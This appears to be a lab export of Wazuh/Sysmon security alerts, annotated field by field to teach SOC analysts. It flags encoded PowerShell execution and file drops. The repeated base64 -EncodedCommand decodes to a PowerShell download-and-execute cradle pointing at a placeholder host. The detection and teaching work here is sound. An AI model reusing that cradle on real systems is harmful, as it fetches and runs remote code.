data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10312
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:51.778+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:51.778+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  139
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535411.2920607
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:49.1622433Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351006
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:49.119 ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ProcessId: 11220 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_i2msvjaf.2l2.ps1 CreationUtcTime: 2025-04-24 22:56:49.119 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:49.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_i2msvjaf.2l2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:49.119
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:55.894+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:55.894+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  136
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535415.2923376
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:53.3837111Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351029
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:50.440 ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ProcessId: 9788 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ParentProcessId: 11220 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:50.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:55.920+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:55.920+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  140
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535415.2931443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:53.6583905Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351030
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:53.627 ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ProcessId: 9788 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gep4ex1m.bat.ps1 CreationUtcTime: 2025-04-24 22:56:53.627 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:53.627
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gep4ex1m.bat.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:53.627
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:58.800+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:58.800+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  137
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535418.2934208
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:56.7879399Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351054
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:55.313 ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ProcessId: 13984 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ParentProcessId: 9788 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:55.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

